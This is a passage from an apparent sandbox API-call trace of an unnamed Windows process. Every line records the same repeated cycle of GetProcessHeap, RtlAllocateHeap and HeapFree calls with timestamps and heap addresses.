lpMem=0xe9deb8 | out: hHeap=0xe30000) returned 1 [0080.102] GetProcessHeap () returned 0xe30000 [0080.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0080.102] GetProcessHeap () returned 0xe30000 [0080.102] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0080.102] GetProcessHeap () returned 0xe30000 [0080.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0080.102] GetProcessHeap () returned 0xe30000 [0080.102] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0080.102] GetProcessHeap () returned 0xe30000 [0080.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0080.102] GetProcessHeap () returned 0xe30000 [0080.102] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0080.102] GetProcessHeap () returned 0xe30000 [0080.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.103] GetProcessHeap () returned 0xe30000 [0080.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.103] GetProcessHeap () returned 0xe30000 [0080.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0080.103] GetProcessHeap () returned 0xe30000 [0080.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0080.103] GetProcessHeap () returned 0xe30000 [0080.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0080.103] GetProcessHeap () returned 0xe30000 [0080.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0080.103] GetProcessHeap () returned 0xe30000 [0080.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0080.103] GetProcessHeap () returned 0xe30000 [0080.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0080.103] GetProcessHeap () returned 0xe30000 [0080.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d888 [0080.103] GetProcessHeap () returned 0xe30000 [0080.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d888 | out: hHeap=0xe30000) returned 1 [0080.103] GetProcessHeap () returned 0xe30000 [0080.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0080.103] GetProcessHeap () returned 0xe30000 [0080.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0080.103] GetProcessHeap () returned 0xe30000 [0080.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0080.103] GetProcessHeap () returned 0xe30000 [0080.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0080.103] GetProcessHeap () returned 0xe30000 [0080.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0080.103] GetProcessHeap () returned 0xe30000 [0080.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0080.103] GetProcessHeap () returned 0xe30000 [0080.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.103] GetProcessHeap () returned 0xe30000 [0080.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.103] GetProcessHeap () returned 0xe30000 [0080.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0080.103] GetProcessHeap () returned 0xe30000 [0080.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0080.103] GetProcessHeap () returned 0xe30000 [0080.104] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0080.104] GetProcessHeap () returned 0xe30000 [0080.104] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0080.104] GetProcessHeap () returned 0xe30000 [0080.104] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0080.104] GetProcessHeap () returned 0xe30000 [0080.104] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0080.104] GetProcessHeap () returned 0xe30000 [0080.104] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0080.104] GetProcessHeap () returned 0xe30000 [0080.104] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0080.104] GetProcessHeap () returned 0xe30000 [0080.104] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0080.104] GetProcessHeap () returned 0xe30000 [0080.104] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0080.104] GetProcessHeap () returned 0xe30000 [0080.104] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0080.104] GetProcessHeap () returned 0xe30000 [0080.104] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0080.104] GetProcessHeap () returned 0xe30000 [0080.104] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0080.104] GetProcessHeap () returned 0xe30000 [0080.104] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0080.104] GetProcessHeap () returned 0xe30000 [0080.104] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0080.104] GetProcessHeap () returned 0xe30000 [0080.104] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0080.104] GetProcessHeap () returned 0xe30000 [0080.104] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0080.104] GetProcessHeap () returned 0xe30000 [0080.104] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0080.104] GetProcessHeap () returned 0xe30000 [0080.104] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0080.104] GetProcessHeap () returned 0xe30000 [0080.104] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0080.104] GetProcessHeap () returned 0xe30000 [0080.104] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0080.104] GetProcessHeap () returned 0xe30000 [0080.104] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0080.104] GetProcessHeap () returned 0xe30000 [0080.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0080.105] GetProcessHeap () returned 0xe30000 [0080.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0080.105] GetProcessHeap () returned 0xe30000 [0080.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0080.105] GetProcessHeap () returned 0xe30000 [0080.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0080.105] GetProcessHeap () returned 0xe30000 [0080.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.105] GetProcessHeap () returned 0xe30000 [0080.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.105] GetProcessHeap () returned 0xe30000 [0080.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0080.105] GetProcessHeap () returned 0xe30000 [0080.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0080.105] GetProcessHeap () returned 0xe30000 [0080.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0080.105] GetProcessHeap () returned 0xe30000 [0080.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0080.105] GetProcessHeap () returned 0xe30000 [0080.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0080.105] GetProcessHeap () returned 0xe30000 [0080.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0080.105] GetProcessHeap () returned 0xe30000 [0080.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.105] GetProcessHeap () returned 0xe30000 [0080.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.105] GetProcessHeap () returned 0xe30000 [0080.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0080.105] GetProcessHeap () returned 0xe30000 [0080.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0080.105] GetProcessHeap () returned 0xe30000 [0080.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0080.105] GetProcessHeap () returned 0xe30000 [0080.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0080.105] GetProcessHeap () returned 0xe30000 [0080.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9deb8 [0080.105] GetProcessHeap () returned 0xe30000 [0080.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9deb8 | out: hHeap=0xe30000) returned 1 [0080.105] GetProcessHeap () returned 0xe30000 [0080.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0080.106] GetProcessHeap () returned 0xe30000 [0080.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0080.106] GetProcessHeap () returned 0xe30000 [0080.106] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0080.106] GetProcessHeap () returned 0xe30000 [0080.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0080.106] GetProcessHeap () returned 0xe30000 [0080.106] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0080.106] GetProcessHeap () returned 0xe30000 [0080.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0080.106] GetProcessHeap () returned 0xe30000 [0080.106] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.106] GetProcessHeap () returned 0xe30000 [0080.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.106] GetProcessHeap () returned 0xe30000 [0080.106] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.106] GetProcessHeap () returned 0xe30000 [0080.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.106] GetProcessHeap () returned 0xe30000 [0080.106] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0080.106] GetProcessHeap () returned 0xe30000 [0080.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0080.106] GetProcessHeap () returned 0xe30000 [0080.106] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0080.106] GetProcessHeap () returned 0xe30000 [0080.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0080.106] GetProcessHeap () returned 0xe30000 [0080.106] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0080.106] GetProcessHeap () returned 0xe30000 [0080.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0080.106] GetProcessHeap () returned 0xe30000 [0080.106] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0080.106] GetProcessHeap () returned 0xe30000 [0080.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0080.106] GetProcessHeap () returned 0xe30000 [0080.106] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0080.106] GetProcessHeap () returned 0xe30000 [0080.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0080.106] GetProcessHeap () returned 0xe30000 [0080.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0080.107] GetProcessHeap () returned 0xe30000 [0080.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0080.107] GetProcessHeap () returned 0xe30000 [0080.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0080.107] GetProcessHeap () returned 0xe30000 [0080.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0080.107] GetProcessHeap () returned 0xe30000 [0080.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0080.107] GetProcessHeap () returned 0xe30000 [0080.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0080.107] GetProcessHeap () returned 0xe30000 [0080.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0080.107] GetProcessHeap () returned 0xe30000 [0080.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0080.107] GetProcessHeap () returned 0xe30000 [0080.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0080.107] GetProcessHeap () returned 0xe30000 [0080.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0080.107] GetProcessHeap () returned 0xe30000 [0080.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0080.107] GetProcessHeap () returned 0xe30000 [0080.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0080.107] GetProcessHeap () returned 0xe30000 [0080.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.107] GetProcessHeap () returned 0xe30000 [0080.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.107] GetProcessHeap () returned 0xe30000 [0080.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0080.107] GetProcessHeap () returned 0xe30000 [0080.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0080.107] GetProcessHeap () returned 0xe30000 [0080.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0080.107] GetProcessHeap () returned 0xe30000 [0080.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0080.107] GetProcessHeap () returned 0xe30000 [0080.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0080.107] GetProcessHeap () returned 0xe30000 [0080.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0080.108] GetProcessHeap () returned 0xe30000 [0080.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0080.108] GetProcessHeap () returned 0xe30000 [0080.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0080.108] GetProcessHeap () returned 0xe30000 [0080.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0080.108] GetProcessHeap () returned 0xe30000 [0080.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0080.108] GetProcessHeap () returned 0xe30000 [0080.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dfd8 [0080.108] GetProcessHeap () returned 0xe30000 [0080.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dfd8 | out: hHeap=0xe30000) returned 1 [0080.108] GetProcessHeap () returned 0xe30000 [0080.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0080.108] GetProcessHeap () returned 0xe30000 [0080.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0080.108] GetProcessHeap () returned 0xe30000 [0080.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0080.108] GetProcessHeap () returned 0xe30000 [0080.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0080.108] GetProcessHeap () returned 0xe30000 [0080.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0080.108] GetProcessHeap () returned 0xe30000 [0080.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0080.108] GetProcessHeap () returned 0xe30000 [0080.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0080.108] GetProcessHeap () returned 0xe30000 [0080.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0080.108] GetProcessHeap () returned 0xe30000 [0080.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0080.108] GetProcessHeap () returned 0xe30000 [0080.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0080.108] GetProcessHeap () returned 0xe30000 [0080.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0080.108] GetProcessHeap () returned 0xe30000 [0080.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0080.108] GetProcessHeap () returned 0xe30000 [0080.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0080.108] GetProcessHeap () returned 0xe30000 [0080.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0080.109] GetProcessHeap () returned 0xe30000 [0080.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0080.109] GetProcessHeap () returned 0xe30000 [0080.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0080.109] GetProcessHeap () returned 0xe30000 [0080.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0080.109] GetProcessHeap () returned 0xe30000 [0080.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0080.109] GetProcessHeap () returned 0xe30000 [0080.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0080.109] GetProcessHeap () returned 0xe30000 [0080.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0080.109] GetProcessHeap () returned 0xe30000 [0080.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0080.109] GetProcessHeap () returned 0xe30000 [0080.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0080.109] GetProcessHeap () returned 0xe30000 [0080.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0080.109] GetProcessHeap () returned 0xe30000 [0080.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0080.109] GetProcessHeap () returned 0xe30000 [0080.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0080.109] GetProcessHeap () returned 0xe30000 [0080.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0080.109] GetProcessHeap () returned 0xe30000 [0080.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0080.109] GetProcessHeap () returned 0xe30000 [0080.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0080.109] GetProcessHeap () returned 0xe30000 [0080.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0080.109] GetProcessHeap () returned 0xe30000 [0080.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0080.109] GetProcessHeap () returned 0xe30000 [0080.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0080.109] GetProcessHeap () returned 0xe30000 [0080.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0080.109] GetProcessHeap () returned 0xe30000 [0080.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0080.109] GetProcessHeap () returned 0xe30000 [0080.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0080.109] GetProcessHeap () returned 0xe30000 [0080.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0080.110] GetProcessHeap () returned 0xe30000 [0080.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0080.110] GetProcessHeap () returned 0xe30000 [0080.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0080.110] GetProcessHeap () returned 0xe30000 [0080.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0080.110] GetProcessHeap () returned 0xe30000 [0080.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.110] GetProcessHeap () returned 0xe30000 [0080.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.110] GetProcessHeap () returned 0xe30000 [0080.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0080.110] GetProcessHeap () returned 0xe30000 [0080.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0080.110] GetProcessHeap () returned 0xe30000 [0080.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0080.110] GetProcessHeap () returned 0xe30000 [0080.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0080.110] GetProcessHeap () returned 0xe30000 [0080.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0080.110] GetProcessHeap () returned 0xe30000 [0080.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0080.110] GetProcessHeap () returned 0xe30000 [0080.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0080.110] GetProcessHeap () returned 0xe30000 [0080.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0080.110] GetProcessHeap () returned 0xe30000 [0080.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0080.110] GetProcessHeap () returned 0xe30000 [0080.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0080.110] GetProcessHeap () returned 0xe30000 [0080.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0080.110] GetProcessHeap () returned 0xe30000 [0080.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0080.110] GetProcessHeap () returned 0xe30000 [0080.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0080.110] GetProcessHeap () returned 0xe30000 [0080.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0080.110] GetProcessHeap () returned 0xe30000 [0080.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0080.111] GetProcessHeap () returned 0xe30000 [0080.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0080.111] GetProcessHeap () returned 0xe30000 [0080.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0080.111] GetProcessHeap () returned 0xe30000 [0080.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0080.111] GetProcessHeap () returned 0xe30000 [0080.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.111] GetProcessHeap () returned 0xe30000 [0080.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.111] GetProcessHeap () returned 0xe30000 [0080.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0080.111] GetProcessHeap () returned 0xe30000 [0080.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0080.111] GetProcessHeap () returned 0xe30000 [0080.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0080.111] GetProcessHeap () returned 0xe30000 [0080.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | 